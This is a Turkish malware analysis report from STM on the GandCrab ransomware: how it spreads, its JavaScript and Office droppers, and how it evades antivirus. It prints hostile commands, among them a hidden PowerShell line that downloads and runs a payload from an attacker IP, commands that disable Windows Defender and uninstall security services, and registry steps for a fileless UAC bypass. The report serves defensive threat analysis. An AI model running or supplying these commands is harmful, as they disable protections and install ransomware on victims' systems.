Zararlı Yazılım - STM · 2019-04-17 · Gandcrab fidye yazılımının Tor ağı üzerinde...
Transcript of Zararlı Yazılım - STM · 2019-04-17 · Gandcrab fidye yazılımının Tor ağı üzerinde...
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
GANDCRAB FİDYECİLİK ZARARLI YAZILIMI
Son zamanlarda Dünya genelinde yayılım oranı artan ve uzun zamandır farklı saldırı
kampanyaları ile varlığını devam ettiren GandCrab fidyecilik zararlı yazılımı, STM Siber Füzyon Merkezi tarafından takip altına alınarak detaylı bir şekilde incelenmiştir. Kullandıkları yöntemler ile zararlı yazılımların hangi ülkelerde çalışmaması gerektiği ile ilgili teknik detaylar grubun Rusya menşeili bir saldırı grubu olduğu kanısını güçlendirmektedir.
Grubun benzer saldırılar yürüttüğü Pinchy Spider, Lalartu isimli saldırgan gruplarının da içerik
dili Rusça olan “Lolzteam” forumda aktif olmaları bu grupların Gandcrab saldırısı ile ilişkili olabilecekleri ihtimalini arttırmaktadır. Pinchy Spider isimli grup ile ilgili ilk tespitler 2018 yılında yapılmıştır. Grup bütün saldırılarında GandCrab zararlı yazılımının farklı versiyonlarını kullanmıştır.
Finansal Motivasyon unsuruna sahip olan GandCrab zararlı yazılımı Lolzteam dışında Exploit.in
forumunda da aktif olarak faaliyet göstermektedir. Gandcrab[at]***.** ve gandcrabraas[at]****.*** e-posta adresleri üzerinden gerçek bir muhattap ile iletişim kurmanın şu an için mümkün olduğu görülmektedir.
Gandcrab fidye yazılımının Tor ağı üzerinde “Ransomware as a Service” olarak satıldığı STM
İstihbarat Merkezi tarafından tespit edilmiştir. Bu servisin yer aldığı forumdaki ilan metni aşağıdaki görselde yer almaktadır.
1) Yayılma Mekanizması GandCrab, çeşitli yayılma mekanizmalarını kullanmaktadır. Bu mekanizmalar spam mailler ve
exploit kitler aracılığıyla gerçekleştirilmektedir. GandCrab zararlısına ait ilk versiyonların RIG ve
GrandSoft exploit kitleri ile spam mailler aracılığıyla dağıtılmak için kullanıldığı görülmüştür.
İlgili spam mailler içerisinde ek olarak yerleştirilmiş ZIP uzantılı dosyaların yer aldığı görülmüş ve zip
içerisinde yer alan javascript dosyasının çalıştırılarak GandCrab zararlısına ait payload dosyasının
indirilerek sisteme enfekte olduğu tespit edilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 1 Ek olarak gönderilen zararlı yazılım
Aşağıdaki görselde GandCrab’in ilk versiyonlarına ait örneklerin javascript dosyaları aracılığıyla
sisteme indirildiği görülmektedir.
Görsel 2 Javascript aracılığıyla indirilen dosya
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
1.1 ) Javascript Dropper
E-Posta eki olarak gelen zip dosyasının içinde yer alan javascript dosyaları, GandCrab orijinal
dosyasını sisteme enfekte etmek için farklı metotlar kullanmaktadır.
Görsel 3 Karmaşıklaştırılmış javascript kod dosyası.
Görsel 3’de yer alan obfuscate edilmiş javascript kod dosyası çalıştırılıp kendini deobfuscate
ettikten sonra powershell komutu çalıştırılmakta ve ardından Gandcrab payload dosyasını
indirmektedir.
İlgili komut aşağıda yer almaktadır :
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile(‘hXXp://92.63.197.38/letsgo.exe?LbPUer’,’C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe’); staRt-ProceSS ‘C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe’
İlerleyen sürümlerde javascript dosyalarına uygulanan obfuscation yöntemlerinin değişiklik gösterdiği
gözlemlenmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 4 Karmaşıklaştırılmış başka bir javascript kod dosyası.
İlgili javascript kodları deobfuscate edildiğinde zararlının uzak sunucudan indirilip çalıştırıldığı
gözlemlenmektedir.
Görsel 5 Uzak sunucudan indirilen GandCrab Payload dosyası.
Uzak sunucudan GandCrab payload dosyası direkt olarak indirilip aşağıdaki komut ile
çalıştırılmaktadır.
C:\Windows\System32\cmd.exe” /c C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe
GandCrab’e ait bir başka javascript dropper dosyası incelendiğinde, GandCrab payload
dosyasını indirmek için direkt olarak powershell ile uzak sunucudan dosya indirip çalıştırma tekniğinin
burada kullanılmadığı görülmüştür.
İncelenen javascript dropper dosyalarında Powershell, ActiveX Object, WScript, gömülü C#
kodları gibi farklı tekniklerin kullanıldığı görülmüştür.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 6 Wscript tekniğinin kullanıldığı kod parçacığı.
Spam maillerde yer alan javascript dosyası açıldığında obfuscate edilmiş kodlar ile
karşılaşılmıştır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 7 Karmaşıklaştırılmış javascript kodu
Obfuscate edilmiş kodlar ve değişkenler dinamik analiz yöntemleri ile incelendiğinde ActiveX
objesi çalıştıran ve ardından WScript aracılığıyla payload dosyalarını çalıştıran kod parçaları
görülmüştür.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 8 Activex ve Wscript ile payload çalıştıran kod parçaçığı
Görsel 9’da yer alan kod parçasının antivirüs yazılımlarını tespit edip sonlandırmak ve enfekte
edilecek sistemde hak yükseltmek için kullanıldığı tespit edilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 9 Antivirüs atlatma ve hak yükseltme için kullanılan kod parçacığı.
İlgili kod sırasıyla aşağıdaki işlemleri gerçekleştirmektedir :
Avast Antivirus tespiti ve sonlandırılması,
Windows Defender tespiti ve sonlandırılması,
Microsoft Network Realtime Inspection Service tespiti ve sonlandırılması,
GandCrab payload dosyasının indirilmesi ve çalıştırılması.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Uygulanan her işlem farklı javascript dosyası olarak çalışmaktadır.
Kyoxks.js
Nykvwcajm.js
Bervcptyvulur.js
Recjyzcz.js
Aşağıdaki fonksiyon, parametre olarak aldığı komutu çalıştırmaktadır. Eğer komut başarılı bir
şekilde çalıştırılmazsa 100ms. beklenmekte ve tekrar denenmektedir. Bu kontrol en fazla 1800 kez
gerçekleşmektedir. Eğer hala başarısız olursa WScript.Shell ile zararlı kod parçacığı sonlandırılmaktadır.
Görsel 10 Antivirüs atlatma ve hak yükseltme için kullanılan kod parçacığı.
Aynı zamanda çalışan servislerin kontrolü WMI (Windows Management Instrumentation)
sorguları aracılığıyla yapılmaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 11 Winmgmts-Windows Management Instrumentation ile servis kontrolü.
Eğer sistemde Avast Antivirus servisi çalışıyorsa kyoxks.js scripti indirilip çalıştırılmaktadır.
Görsel 12 Avast antivirüs kontrolü için “kyoxks.js” scriptinin indirilip çalıştırılması.
Antivirus yazılımlarını atlatma amaçlı geliştirilmiş payload dosyalarının yer aldığı ana kod
dosyası deobfuscate edildiğinde, javascript dosyalarının çalıştırılacağı metotlar karşımıza çıkmaktadır.
Kodlar üzerinde düzenleme yapıldığında ilgili metotlardan birine Görsel 13’de yer verilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 13 Kyoxks.js payload kodu
Bu aşamadan sonra dört farklı Antivirus yazılımlarını atlatma amaçlı geliştirilmiş payload
dosyalarının yer aldığı javascript kodları deobfuscate edilecektir.
Deobfuscate edilen kyoxks.js dosyasına Görsel 14’de yer verilmiştir. İlgili kod parçasında
nfdmkk değişkenine atanmış, Base64 ile encode edilmiş Unicode Powershell kod parçası
görülmektedir.
Bu kod parçası decode edilip Windows kayıt defterinde aşağıda yer alan alana yazılmaktadır ;
HKEY_CURRENT_USER\SOFTWARE\ycsdrr\pvrylqzhlnv
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 14 Kyoxks.js isimli scriptin deobfuscate edilmesi.
Zararlı kod parçası, Windows kayıt defterine yazıldıktan sonra powershell aracılığıyla
çalıştırılmaktadır.
Görsel 15 Powershell aracılığıyla kayıt defterine yazılan zararlı kod parçası.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Powershell kodu çalıştırılmadan önce Windows versiyon kontrolü yapılmaktadır. Versiyon
kontrol aralıklarının 6 ile 10 arasında olduğu görülmektedir. Dolayısıyla saldırganlar tarafından
hedeflenen işletim sistemleri aşağıdaki gibidir :
Windows Vista Windows Server 2008 Windows Server 2008 R2 Windows 7 Windows Server 2012 Windows 8 Windows Server 2012 R2 Windows 8.1 Windows Server 2016 Windows Server 2019 Windows 10
Versiyon kontrolü yapıldıktan sonra, versiyon numarasına göre powershell kodu çalıştırılmaktadır.
Görsel 16 Versiyon numarasına göre çalıştırılan powershell kodu.
Windows kayıt defterine “HKCU:\\Software\\Classes\\exefile\\shell\\open\\command\\” alanı açılıp Base64 ile encode edilmiş zararlı kod parçası, slui.exe olarak kayıt edilip zamanlanmış görevler aracılığıyla çalıştırılmaktadır. Çalıştırma işlemi bittikten sonra “HKCU:\\Software\\Classes\\exefile\\” altındaki alanlar silinmektedir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Nfdmkk değişkeninde yer alan Base64 ile encode edilmiş kod, decode edildiğinde aşağıdaki
kod parçası oluşmaktadır.
Görsel 17 Encode edilmiş kodun decode edilmesi.
İlgili powershell kodu aşağıdaki işlemleri yapmaktadır :
Dosyaların geçici dizine kopyalanması,
Avast Update uygulamasının bulunması,
Ön belleğe alınmış verilerin temizlenmesi,
Add-Type kısmından sonra başlayan C# kodunun çalıştırılması
Add-Type kısmından sonra Powershell kodunun içerisine C# kodu yerleştirildiği görülmektedir.
İlgili C# kodu Avast Updater servisinin process id numarasını bulup, uygun mesajı ShowWindows
metodunu kullanarak a11, a14 veya a13 metotları aracılığıyla göndermektedir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 18 AddType kısmından sonra çalıştırılan C# kodu.
Gömülü olarak yerleştirilen C# kodu kullanılarak Görsel 19’da yer alan powershell kodları ile
Avast Updater işlemi atlatılmaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 19 Avast Updater işleminin atlatılması
Bu aşamadan sonra yukarıda bahsedilen powershell ve scheduler task (zamanlanmış görevler)
komutları çalıştırılarak lqesuuz isimli zamanlanmış görevler ayarlanmaktadır.
Eğer servisler içerisinde WdNisSvc veya WinDefend varsa nykvwcajm.js scripti
çalıştırılmaktadır. İlgili script Windows Defender servisini deaktif etmek için kullanılmaktadır.
Görsel 20 Windows Defender servisinin deaktif edilmesi.
Servisleri deaktif etmek için kullanılan kodlar temelinde birbirlerine benzemektedir.
Nykvwcajm.js scriptinin decrypt edilmiş haline Görsel 21’de yer verilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 21 Nykvwcajm.js scriptinin decrypt edilmiş kodları
İlgili scriptin gerçekleştirdiği işlemler aşağıda listelenmiştir :
WdNisSvc veya WinDefend servislerinin çalışıp çalışmadığının kontrolü, İşletim sistemi versiyonuna göre çalıştırılacak komutların belirlenmesi, (İlgili zararlının analizi Windows 7 ve Windows 10 ortamlarında gerçekleştirilmiştir.) cmd.exe /C “powershell Set-MpPreference -DisableRealtimeMonitoring $true && taskkill /im MSASCui* /f /t . “fodhelper.exe /C “sc stop WinDefend && taskkill /im MSASCui /f /t” komutu “HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command\” kayıt defteri alanına yazılmaktadır. İlgili komutlar ile Windows Defender servisi disable duruma getirilmektedir. “HKEY_CURRENT_USER\Software\Classes\mssettings\shell\open\command\DelegateExecute” kayıt defteri alanı boş olarak ayarlanmaktadır. fodhelper.exe dosyası çalıştırılmaktadır. Çalıştırıldıktan 2 saniye sonra “HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command\\” kayıt defteri değeri silinmektedir.
Yapılan araştırmalar sonrasında ilgili zararlının Windows Defender servisini deaktif etmek için
Windows sistemlerde yer alan privilege escalation (hak yükseltme) tekniğini kullandığı ve
saldırganların direkt olarak ilgili zafiyeti istismar eden exploiti kullandıkları tespit edilmiştir.
İlgili tekniğin Fileless UAC Bypass / Registry Hijacking olarak adlandırıldığı görülmüştür.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Eğer servisler içerisinde Microsoft Network Realtime Inspection Service(NisSrv) varsa bervcptyvulur.js scripti çalıştırılmaktadır. İlgili script Microsoft Network Realtime Inspection Service’i bypass etmek için kullanılmaktadır.
Görsel 22 Microsoft Network Realtime Inspection Service için bervcptyvulur.js çalıştıran kod
Bervcptyvulur.js scriptinin decrypt edilmiş hali aşağıdaki gibidir.
Görsel 23 Bervcptyvulur.js scriptinin decrypt edilmiş hali
İlgili kodda da “MsiExec.exe /X{2AA3C13E-0531–41B8-AE48-AE28C940A809} ACCEPT=YES /qr+ /quiet” komutu ile Microsoft Network Realtime Inspection Service bypass edilmektedir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Eğer servisler içerisinde AhnLab v3 Antivirus (V3 Service) varsa recjyzcz.js scripti
çalıştırılmaktadır. İlgili script AhnLab v3 Antivirus uygulamasını deaktif etmek için kullanılmaktadır.
Görsel 24 AhnLab v3 Antivirüs kontrolü yapan kod.
Recjyzcz.js scriptinin decrypt edilmiş haline Görsel-25’de yer verilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 25 Recjyzcz.js scriptinin decrypt edilmesi.
Kod içerisinde yer alan Powershell kodu “HKEY_CURRENT_USER\\Software\\capvzgf\\cazysa” kayıt defteri alanına yazılmakta, ardından önceki anlatılan metotlarla aynı şekilde sistemde hak yükseltme yapılmaktadır.
Script içerisinde yer alan Base64 encoded veri decode edildiğinde, içerisine C# kodları gömülü Powershell kod parçası oluşmaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 26 Base64 ile encode edilmiş verinin decode edilmesi.
Sistemde hak yükseltme işlemi tamamlandıktan sonra aşağıdaki komutlar çalıştırılmaktadır :
C:\Windows\System32\cmd.exe /c “runas /trustlevel:0x40000 \Desktop\install.exe -Uninstall” & “%TEMP%\AhnUn000.tmp” –UC
C:\Windows\System32\cmd.exe /c “runas /trustlevel:0x40000 %TEMP%\AhnUn000.tmp” -UC
İlgili komutlar çalıştırıldıktan sonra Görsel 27’de yer alan kod parçası ile AhnLab v3 Antivirus
uygulaması sistemden kaldırılmaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 27 AhnLab v3 Antivirus uygulaması sistemden kaldırılmaktadır.
Dropper’a ait tüm adımlar başarıyla gerçekleştikten sonra GandCrab’a ait payload dosyası
indirilmekte ve ilgili zararlı çalıştırılıp sistem enfekte hale getirilmektedir.
Payload dosyasına ait decryption aşamaları Görsel 28’de yer almaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 28 Payload dosyasına ait decryption.
Yapılan incelemeler sonucunda Gandcrab payload dosyasının ProcessDoppelgänging isimli bir Process Hollowing tekniği ile sisteme yerleştiği tespit edilmiştir.
1.2 ) MSOffice Dropper
Javascript dosyalarına alternatif olarak GandCrab, zararlı ofis dosyaları ile de esas payload
dosyasını indirmektedir. Görsel 29’da yer alan bir mail ile “.doc” dosyasının kullanıcının açılması
sağlanmakta ve zararlı VBA kodları çalıştırılarak GandCrab’e ait payload dosyası indirilmektedir.
Görsel 29 GandCrab’e ait payload dosyasının indirilme aşaması.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
E-posta eki olarak gelen bazı ofis dosyalarının parola korumalı olarak gösterildiği görülmüştür.
Görsel 30 Oltalama yöntemi ile kurbana ulaşan bir e-posta eki.
1.3 ) Exploit Kit
Gandcrab, bir başka saldırı vektörü olarak exploit kitleri kullanmaktadır. Yapılan araştırmalar ve incelemeler sonucunda Gandcrab ekibinin Fallout, Grandsoft, RIG, Magnitude, EITest, Necurs exploit kitleri aracılığıyla saldırılar gerçekleştirdiği tespit edilmiştir.
Kullanıcıların web tarayıcılarında bulunan zafiyetleri istismar etme yöntemi, saldırganların sıklıkla kullandığı yöntemlerden biridir. Örnek olarak kullanıcı güncel olmayan bir Flash sürümü kullanıyorsa, saldırganların kullanıcıya zararlı kodlar içeren linki tıklatarak enfeksiyon işlemini tamamlaması yetmektedir.
Bunlara bağlı olarak RIG exploit kiti bünyesinde CVE-2018–4878 ve CVE-2018–8174 Flash zafiyetleri ile Gandcrab payloadlarını barındırmaktadır. Bu konu Nisan 2018 tarihinde zararlı yazılım araştırmacıları tarafından keşfedilmiştir.
Görsel 31 RIG Exploit kitinin istismar ettiği uygulamalar.
RIG Exploit Kitinin dünya genelinde gösterdiği yayılıma ait enfekte şeması aşağıdaki gibidir. Exploit Kit içerisinde yer alan ülkeler arasında Türkiye’de yer almaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 32 RIG Exploit kitinin yayılım haritası.
Gandcrab RIG Exploit Kit’ine ait saldırı ve enfeksiyon grafiği aşağıdaki görselde yer almaktadır.
